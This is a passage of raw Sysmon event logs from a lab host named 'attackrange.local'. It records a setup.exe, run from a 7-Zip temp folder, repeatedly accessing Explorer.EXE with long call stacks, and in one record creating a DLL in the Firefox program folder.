64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-core-file-l2-1-0.dll2021-01-18 13:59:52.114 10341000x800000000000000014163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
